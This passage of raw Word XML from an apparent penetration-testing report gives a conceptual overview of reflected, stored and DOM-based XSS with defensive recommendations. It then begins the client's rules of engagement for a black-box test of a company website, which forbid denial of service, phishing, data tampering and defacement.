        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.4018/978-1-60960-765-4.ch004","abstract":"XSS (Ejecución de Comandos Cruzados) es un vector de ataque a páginas web, aplicaciones locales e incluso al propio navegador que es utilizado para robar información personal secuestrando sesiones de usuario, esto ocurre cuando no se valida adecuadamente la entrada y salida de información a una página web.","author":[{"dropping-particle":"","family":"Raya","given":"Almudena Alcaide","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alis","given":"Jorge Blasco","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Herrero","given":"Eduardo Galán","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Diaz-Pabón","given":"Agustín Orfila","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Innovations in SMEs and Conducting E-Business","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"Cross-Site Scripting","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=a1642dbb-3593-4e7f-9355-11d171f98d5c"]}],"mendeley":{"formattedCitation":"[96]","plainTextFormattedCitation":"[96]","previouslyFormattedCitation":"[96]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[96]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC6024" w14:textId="26B043AA" w:rsidR="00405516" w:rsidRDefault="00B54627" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3:- </w:t>
      </w:r>
      <w:r w:rsidR="00293D05">
        <w:t>XSS can also be utilised to deface a website by altering the HTML body</w:t>
      </w:r>
      <w:r w:rsidR="00383FD3">
        <w:t xml:space="preserve"> through code injection</w:t>
      </w:r>
      <w:r w:rsidR="006D20A0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002203B2">
        <w:t xml:space="preserve"> Vulnerable websites to XSS include JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, PHP </w:t>
      </w:r>
      <w:r w:rsidR="002203B2">
        <w:t>and/or CSS coding utilised to create a dynamic website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with a backend database.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r>
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Cross-Site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(XSS)","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"Cross-site Scripting (XSS) - OWASP","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=d89d6c8b-df0e-460b-b780-32d277c6ecdd"]}],"mendeley":{"formattedCitation":"[94]","plainTextFormattedCitation":"[94]","previouslyFormattedCitation":"[94]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[94]</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F75F4" w14:textId="07E55E23" w:rsidR="000D59C0" w:rsidRDefault="000D59C0" w:rsidP="00AD7732">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">There are three methods to successfully initiating </w:t>
      </w:r>
      <w:r w:rsidR="00E3671D">
        <w:t>an</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> XSS attack which are:</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1007/s13198-015-0376-0","ISSN":"09764348","abstract":"Nowadays, web applications are becoming one of the standard platforms for representing data and service releases over the World Wide Web. Since web applications are progressively more utilized for security-critical services, therefore they have turned out to be a well-liked and precious target for the web-related vulnerabilities. Even though several defensive mechanisms have been building up to reinforce the modern web applications and alleviate the attacks instigated against them. We have analyzed the major concerns for web applications and Internet-based services which are persistent in several web applications of diverse organizations like banking, health care, financial service, retail and so on by the referring the Website Security Statistics Report of White Hat Security. In this paper, we highlight some of the serious vulnerabilities found in the modern web applications and revealed various serious vulnerabilities. Cross-Site Scripting (XSS) attack is the top most vulnerability found in the today’s web applications which to be a plague for the modern web applications. XSS attacks permit an attacker to execute the malicious scripts on the victim’s web browser resulting in various side-effects such as data compromise, stealing of cookies, passwords, credit card numbers etc. We have also discussed a high level of taxonomy of XSS attacks and detailed incidences of these attacks on web applications. A detailed comprehensive analysis of the exploitation, detection and prevention mechanisms of XSS attacks has also been discussed. Based on explored strength and flaws of these mechanisms, we have discussed some further work.","author":[{"dropping-particle":"","family":"Gupta","given":"Shashank","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gupta","given":"B. B.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of Systems Assurance Engineering and Management","id":"ITEM-1","issued":{"date-parts":[["2017"]]},"title":"Cross-Site Scripting (XSS) attacks and defense mechanisms: classification and state-of-the-art","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=6da516b2-6811-42a4-be25-fa02a6c74594"]},{"id":"ITEM-2","itemData":{"DOI":"10.1016/j.cose.2009.04.008","ISSN":"01674048","abstract":"Web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 © 2009 Elsevier Ltd. All rights reserved.","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and Security","id":"ITEM-2","issued":{"date-parts":[["2009"]]},"title":"Client-side cross-site scripting protection","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=a8d3ccc3-46c3-493a-a5a0-22084fa5fb90"]},{"id":"ITEM-3","itemData":{"DOI":"10.4018/978-1-60960-765-4.ch004","abstract":"XSS (Ejecución de Comandos Cruzados) es un vector de ataque a páginas web, aplicaciones locales e incluso al propio navegador que es utilizado para robar información personal secuestrando sesiones de usuario, esto ocurre cuando no se valida adecuadamente la entrada y salida de información a una página web.","author":[{"dropping-particle":"","family":"Raya","given":"Almudena Alcaide","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Alis","given":"Jorge Blasco","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Herrero","given":"Eduardo Galán","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Diaz-Pabón","given":"Agustín Orfila","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Innovations in SMEs and Conducting E-Business","id":"ITEM-3","issued":{"date-parts":[["2011"]]},"title":"Cross-Site Scripting","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=a1642dbb-3593-4e7f-9355-11d171f98d5c"]},{"id":"ITEM-4","itemData":{"abstract":"Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.","author":[{"dropping-particle":"","family":"OWASP","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Cross-site Scripting (XSS)","id":"ITEM-4","issued":{"date-parts":[["2014"]]},"title":"Cross-site Scripting (XSS) - OWASP","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=d89d6c8b-df0e-460b-b780-32d277c6ecdd"]}],"mendeley":{"formattedCitation":"[94], [96]–[98]","plainTextFormattedCitation":"[94], [96]–[98]","previouslyFormattedCitation":"[94], [96]–[98]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B54627" w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[94], [96]–[98]</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9853B7" w14:textId="7D87EB8B" w:rsidR="00505697" w:rsidRPr="000342B1" w:rsidRDefault="000D59C0" w:rsidP="000342B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D59C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reflected:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D59C0">
        <w:t>This method initiates a malicious script to the victim via a HTTP request</w:t>
      </w:r>
      <w:r w:rsidR="00700FFB">
        <w:t xml:space="preserve"> embedded within a website hyperlink</w:t>
      </w:r>
      <w:r w:rsidRPr="000D59C0">
        <w:t>, where the victim is then redirected to a malicious website</w:t>
      </w:r>
      <w:r w:rsidR="00700FFB">
        <w:t xml:space="preserve"> where an attacker can steal user credentials or gain access to their personal device by executing a persistent trojan horse within their device</w:t>
      </w:r>
      <w:r w:rsidRPr="000D59C0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264387E" w14:textId="77777777" w:rsidR="000342B1" w:rsidRPr="000342B1" w:rsidRDefault="000342B1" w:rsidP="000342B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35915060" w14:textId="64FA6731" w:rsidR="000342B1" w:rsidRPr="000342B1" w:rsidRDefault="00505697" w:rsidP="000342B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D59C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stored:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>This advanced XSS method which is also known as a persistent XSS attack which is the greatest security risk to a multitude of victims, because the attack originates from stored malicious code within the frontend database injected by the malicious attacker into a comment section and/or website forum as a hidden HTML JavaScript tag within a website that is executed within the victims client browser every time that page is visited. This attack yields the most results for attackers due to the nature of the attack and the large volume of potential victim pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555B464" w14:textId="77777777" w:rsidR="000342B1" w:rsidRPr="000342B1" w:rsidRDefault="000342B1" w:rsidP="000342B1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506988AD" w14:textId="136659CB" w:rsidR="00505697" w:rsidRPr="008C5035" w:rsidRDefault="000342B1" w:rsidP="008C5035">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D59C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DOM-Based:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Whereas reflected and stored XSS attacks are originate within the webserver due to incompetent website design and programming which is referred to as a server-side attack. A DOM-Based XSS attack </w:t>
      </w:r>
      <w:r w:rsidR="00042A29">
        <w:t xml:space="preserve">or type-0 XSS as it is also referred to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is more akin to a social engineering attack where a malicious </w:t>
      </w:r>
      <w:r w:rsidR="008C5035">
        <w:t>hyper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">link to a website the victim is familiar with is E-Mailed to the end user and once clicked </w:t>
      </w:r>
      <w:r w:rsidR="008C5035">
        <w:t>malicious code is executed within the victims browser, that can be utilised to steal session cookies and or  install a trojan horse within the victims device to gain full remote access to their device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233EC8E" w14:textId="400CC4C6" w:rsidR="00AD7732" w:rsidRDefault="00383FD3" w:rsidP="00E20D60">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To prevent XSS attacks</w:t>
      </w:r>
      <w:r w:rsidR="002203B2">
        <w:t xml:space="preserve">, network security researchers recommend that website developers encode all outgoing HTTP responses to prevent the data as being construed as active and also filter input data very strictly to what is an expected or valid input within a dynamic </w:t>
      </w:r>
      <w:r w:rsidR="00AD200C">
        <w:t xml:space="preserve">user input </w:t>
      </w:r>
      <w:r w:rsidR="002203B2">
        <w:t>form such as; forums</w:t>
      </w:r>
      <w:r w:rsidR="00AD200C">
        <w:t xml:space="preserve"> and comment sections of a website.</w:t>
      </w:r>
      <w:r w:rsidR="008B5B7E">
        <w:t xml:space="preserve"> HTTP iframes should also be either disabled or very carefully crafted to prevent malware being injected from a </w:t>
      </w:r>
      <w:r w:rsidR="005F5DE3">
        <w:t>third-party</w:t>
      </w:r>
      <w:r w:rsidR="008B5B7E">
        <w:t xml:space="preserve"> website using a XSS technique.</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00167EC1">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/j.cose.2009.04.008","ISSN":"01674048","abstract":"Web applications are becoming the dominant way to provide access to online services. At the same time, web application vulnerabilities are being discovered and disclosed at an alarming rate. Web applications often make use of JavaScript code that is embedded into web pages to support dynamic client-side behavior. This script code is executed in the context of the user's web browser. To protect the user's environment from malicious JavaScript code, browsers use a sand-boxing mechanism that limits a script to access only resources associated with its origin site. Unfortunately, these security mechanisms fail if a user can be lured into downloading malicious JavaScript code from an intermediate, trusted site. In this case, the malicious script is granted full access to all resources (e.g., authentication tokens and cookies) that belong to the trusted site. Such attacks are called cross-site scripting (XSS) attacks. In general, XSS attacks are easy to execute, but difficult to detect and prevent. One reason is the high flexibility of HTML encoding schemes, offering the attacker many possibilities for circumventing server-side input filters that should prevent malicious scripts from being injected into trusted sites. Also, devising a client-side solution is not easy because of the difficulty of identifying JavaScript code as being malicious. This paper presents Noxes, which is, to the best of our knowledge, the first client-side solution to mitigate cross-site scripting attacks. Noxes acts as a web proxy and uses both manual and automatically generated rules to mitigate possible cross-site scripting attempts. Noxes effectively protects against information leakage from the user's environment while requiring minimal user interaction and customization effort. © 2009 Elsevier Ltd. All rights reserved.","author":[{"dropping-particle":"","family":"Kirda","given":"Engin","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jovanovic","given":"Nenad","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kruegel","given":"Christopher","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vigna","given":"Giovanni","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Computers and Security","id":"ITEM-1","issued":{"date-parts":[["2009"]]},"title":"Client-side cross-site scripting protection","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=a8d3ccc3-46c3-493a-a5a0-22084fa5fb90"]},{"id":"ITEM-2","itemData":{"DOI":"10.1007/s13198-015-0376-0","ISSN":"09764348","abstract":"Nowadays, web applications are becoming one of the standard platforms for representing data and service releases over the World Wide Web. Since web applications are progressively more utilized for security-critical services, therefore they have turned out to be a well-liked and precious target for the web-related vulnerabilities. Even though several defensive mechanisms have been building up to reinforce the modern web applications and alleviate the attacks instigated against them. We have analyzed the major concerns for web applications and Internet-based services which are persistent in several web applications of diverse organizations like banking, health care, financial service, retail and so on by the referring the Website Security Statistics Report of White Hat Security. In this paper, we highlight some of the serious vulnerabilities found in the modern web applications and revealed various serious vulnerabilities. Cross-Site Scripting (XSS) attack is the top most vulnerability found in the today’s web applications which to be a plague for the modern web applications. XSS attacks permit an attacker to execute the malicious scripts on the victim’s web browser resulting in various side-effects such as data compromise, stealing of cookies, passwords, credit card numbers etc. We have also discussed a high level of taxonomy of XSS attacks and detailed incidences of these attacks on web applications. A detailed comprehensive analysis of the exploitation, detection and prevention mechanisms of XSS attacks has also been discussed. Based on explored strength and flaws of these mechanisms, we have discussed some further work.","author":[{"dropping-particle":"","family":"Gupta","given":"Shashank","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gupta","given":"B. B.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"International Journal of Systems Assurance Engineering and Management","id":"ITEM-2","issued":{"date-parts":[["2017"]]},"title":"Cross-Site Scripting (XSS) attacks and defense mechanisms: classification and state-of-the-art","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=6da516b2-6811-42a4-be25-fa02a6c74594"]}],"mendeley":{"formattedCitation":"[97], [98]","plainTextFormattedCitation":"[97], [98]","previouslyFormattedCitation":"[97], [98]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B54627" w:rsidRPr="00B54627">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[97], [98]</w:t>
      </w:r>
      <w:r w:rsidR="00B54627">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4122" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc40134039"/>
      <w:r>
        <w:t>2.4 Summary of Section</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="2B9C4123" w14:textId="2B00FA07" w:rsidR="00C5650F" w:rsidRPr="00F10F5D" w:rsidRDefault="000D7992" w:rsidP="00F10F5D">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Utilising the research from this section of the report</w:t>
      </w:r>
      <w:r w:rsidR="000B348B">
        <w:t>, the information gained</w:t>
      </w:r>
      <w:r w:rsidR="00361530">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000B348B">
        <w:t xml:space="preserve"> will</w:t>
      </w:r>
      <w:r w:rsidR="00361530">
        <w:t xml:space="preserve"> aid the researcher</w:t>
      </w:r>
      <w:r w:rsidR="00C56FB8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B348B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C56FB8">
        <w:t xml:space="preserve">during the ‘Black Box’ blind penetration </w:t>
      </w:r>
      <w:r w:rsidR="00361530">
        <w:t>to easily identify common and unorthodox website vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00736332">
        <w:t xml:space="preserve"> that can be leveraged against a website along with the defensive security techniques that can be implemented to mitigate any vulnerabilities found within the target website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4124" w14:textId="0A2C56BE" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc40134040"/>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Penetration Testing Contingency Policy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="6812A8F0" w14:textId="6AFAB6B5" w:rsidR="00B52E82" w:rsidRDefault="00B52E82" w:rsidP="00AB4581">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A penetration testing contingency policy</w:t>
      </w:r>
      <w:r w:rsidR="00AB4581">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> highlights the rules put in place by the network security engineer of the target company</w:t>
      </w:r>
      <w:r w:rsidR="00AB4581">
        <w:t xml:space="preserve"> and/or Chief Executive Officer (CEO)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, to prevent the live website and/or network that is being tested on </w:t>
      </w:r>
      <w:r w:rsidR="00AB4581">
        <w:t>along with the staff/clients of the company, from being denied network/application services that the company network</w:t>
      </w:r>
      <w:r w:rsidR="00FE267B">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00AB4581">
        <w:t>website provides for day to day business. Client and staff data protection is also a high priority for the company and penetration tester</w:t>
      </w:r>
      <w:r w:rsidR="00ED3AE9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB4581">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED3AE9">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00FE267B">
        <w:t>herefore</w:t>
      </w:r>
      <w:r w:rsidR="00ED3AE9">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AB4581">
        <w:t xml:space="preserve"> an </w:t>
      </w:r>
      <w:r w:rsidR="00FE267B">
        <w:t>agreed</w:t>
      </w:r>
      <w:r w:rsidR="00AB4581">
        <w:t xml:space="preserve"> set of rules </w:t>
      </w:r>
      <w:r w:rsidR="00FE267B">
        <w:t xml:space="preserve">and guidelines have been put in place to prevent the target website from </w:t>
      </w:r>
      <w:r w:rsidR="00ED3AE9">
        <w:t>becoming unavailable to staff/clients</w:t>
      </w:r>
      <w:r w:rsidR="00FE267B">
        <w:t xml:space="preserve"> during the live penetration test of </w:t>
      </w:r>
      <w:r w:rsidR="00BE65D6" w:rsidRPr="00E943D8">
        <w:t>www.tevelcyber.com</w:t>
      </w:r>
      <w:r w:rsidR="00BE65D6">
        <w:t xml:space="preserve"> during the pre-engagement interaction stage of the penetration test</w:t>
      </w:r>
      <w:r w:rsidR="00FE267B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F30B63" w14:textId="05E118CD" w:rsidR="00B52E82" w:rsidRDefault="00D45019" w:rsidP="00D45019">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D45019">
        <w:t>Dr</w:t>
      </w:r>
      <w:r w:rsidR="00D615FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D45019">
        <w:t>Harish Ramani</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> whom is the CEO</w:t>
      </w:r>
      <w:r w:rsidRPr="00D45019">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chief </w:t>
      </w:r>
      <w:r w:rsidRPr="00D45019">
        <w:t>Technology Officer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (CTO) of </w:t>
      </w:r>
      <w:r w:rsidR="009025A2">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cyber Ltd</w:t>
      </w:r>
      <w:r w:rsidR="009025A2">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has instructed the </w:t>
      </w:r>
      <w:r w:rsidR="0053741B">
        <w:t xml:space="preserve">network security </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">researcher to adhere to the following guidelines whilst performing </w:t>
      </w:r>
      <w:r w:rsidR="0053741B">
        <w:t>offensive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security testing of the companies live website;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC81A5" w14:textId="72F54A0C" w:rsidR="00D45019" w:rsidRDefault="0041086F" w:rsidP="002144DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Do not perform any Distributed Denial of Service (DDOS) attacks against the company website which would make the website unavailable to staff and clients of the company.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726A8CB" w14:textId="77777777" w:rsidR="0041086F" w:rsidRDefault="0041086F" w:rsidP="0041086F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00743D73" w14:textId="708B9B09" w:rsidR="0041086F" w:rsidRDefault="0041086F" w:rsidP="002144DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not leverage any social engineering attacks against staff or clients of the company using phishing E-Mails etc </w:t>
      </w:r>
      <w:r w:rsidR="002144DC">
        <w:t xml:space="preserve">that contain malware or a masked hyperlink to an unsafe websites </w:t>
      </w:r>
      <w:r w:rsidR="00E2084A">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gain access </w:t>
      </w:r>
      <w:r w:rsidR="00E2084A">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="002144DC">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E2084A">
        <w:t xml:space="preserve">underlying </w:t>
      </w:r>
      <w:r w:rsidR="002144DC">
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="00E2084A">
        <w:t>/website</w:t>
      </w:r>
      <w:r w:rsidR="002144DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E2084A">
        <w:t>and/</w:t>
      </w:r>
      <w:r w:rsidR="002144DC">
        <w:t>or reveal sensitive information, such as; login credentials of staff/clients</w:t>
      </w:r>
      <w:r w:rsidR="00E2084A">
        <w:t xml:space="preserve"> etc</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7197D894" w14:textId="77777777" w:rsidR="0041086F" w:rsidRDefault="0041086F" w:rsidP="0041086F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="245BD219" w14:textId="0FC495A1" w:rsidR="0041086F" w:rsidRDefault="0041086F" w:rsidP="00267067">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not access, modify or delete any data stored within </w:t>
      </w:r>
      <w:r w:rsidR="002144DC">
        <w:t>the websites databases that includes user accounts of the website</w:t>
      </w:r>
      <w:r w:rsidR="00414DED">
        <w:t xml:space="preserve"> to conform with General Data Protection Regulations (GDPR)</w:t>
      </w:r>
      <w:r w:rsidR="002144DC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C592726" w14:textId="77777777" w:rsidR="002144DC" w:rsidRDefault="002144DC" w:rsidP="002144DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDAFFB6" w14:textId="7168B36F" w:rsidR="00873558" w:rsidRDefault="00D615FE" w:rsidP="00267067">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not deface the website </w:t>
      </w:r>
      <w:r w:rsidR="00873558">
        <w:t>using banner hijacking or any other malicious website exploits.</w:t>
      </w:r>
    </w:p>
